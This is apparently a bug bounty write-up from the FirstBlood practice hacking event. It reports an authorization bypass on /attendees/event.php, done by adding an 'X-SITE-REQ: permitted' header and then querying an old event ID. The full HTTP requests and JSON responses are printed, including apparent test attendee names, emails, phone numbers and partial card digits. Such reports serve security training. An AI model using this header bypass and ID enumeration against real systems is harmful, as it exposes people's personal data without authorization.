FirstBlood-#28/attendees/event.php authoriation bypass using X-SITE-REQ: permitted



On 2021-05-09, jpdev reported:

Summary

Within /manageappointment.php there is a reference to a X-SITE-REQ: permitted using this on the page /hackerback.html it is possible to return attentendance information bypassing authorization on the endpoint /attendees/event.php

Within the /hackerback.html page there is a reference to an API to query an API to return all of the attendee names and thier status

<script> function getAttendees() { var attending = false;

    if (attending == true) {
        sendRequest("/attendees/event.php?q=560720");
   }
</script>

You can bypass this attending check by firstly navigating to /attendees/event.php?q=560720 and capturing the request witin BURP, send this to repeater, with the request add the X-SITE-REQ: permitted to the request and submit it. It will return a JSON object with attendance information.

REQUEST

GET /attendees/event.php?q=560720 HTTP/1.1 Host: firstbloodhackers.com:49227 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-SITE-REQ: permitted DNT: 1 Connection: close Referer: http://firstbloodhackers.com:49227/drpanel/index.php Upgrade-Insecure-Requests: 1

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Sun, 09 May 2021 15:44:12 GMT Content-Type: application/json Connection: close Content-Length: 3267

{"event":[{"id":"560720","title":"HackerBack","description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{}],"able_to_modify":"false","is_event_hidden":"false","old_title":"HackerBack","old_eventID":"560700","old_description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","old_massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","old_time":"N/A","old_when":"N/A","cancelled_attendees":[{"fName":"Sean","cancelled":"true"},{"fName":"Abi","cancelled":"true"},{"fName":"John","cancelled":"true"},{"fName":"Melissa","cancelled":"true"}]}]}

Expanded further

Within the response an old_eventID is returned using this old_eventID to query the same api we can return Sesnistive information such as Name, Tel, Email and the last 4 digits of the CC

Request

GET /attendees/event.php?q=560700 HTTP/1.1 Host: firstbloodhackers.com:49227 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-SITE-REQ: permitted DNT: 1 Connection: close Referer: http://firstbloodhackers.com:49227/drpanel/index.php Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK Server: nginx Date: Sun, 09 May 2021 16:03:28 GMT Content-Type: application/json Connection: close Content-Length: 3622

{"event":[{"id":"560700","title":"HackerBack","description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{"name":"Sean R","email":"[email protected]","confirmed":true,"contactNumber":"+44 141 496 0250","last_4_CC":"9090"},{"name":"Trevor B","email":"[email protected]","confirmed":true,"contactNumber":"+44 116 496 0581","last_4_CC":"5323"},{"name":"Julie L","email":"[email protected]","confirmed":true,"contactNumber":"+44 117 496 0999","last_4_CC":"1337"}],"able_to_modify":"false","is_event_hidden":"false","old_title":"HackerBack","old_eventID":"n/a","old_description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","old_massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","old_time":"N/A","old_when":"N/A","cancelled_attendees":[{"fName":"Sean","cancelled":"true"},{"fName":"Abi","cancelled":"true"},{"fName":"John","cancelled":"true"},{"fName":"Melissa","cancelled":"true"}]}]}

Impact

Authorization bypass on the API point by adding the "X-SITE-REQ: permitted" header. Returning attendance data.

Expandded in to leaking PII of Name, Telephone, Email and last 4 digits of CC

P1 CRITICAL

Endpoint: /attendees/event.php

Parameter: /attendees/event.php

Payload: X-SITE-REQ: permitted


FirstBlood ID: 13
Vulnerability Type: Info leak

/attendees/event can be seen on the HackerBack.html page but has a blank response. Upon further inspection and from making use of the web app, you will notice you can add certain headers in order to interact with this endpoint. An old event ID leaks PII information about attendees.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.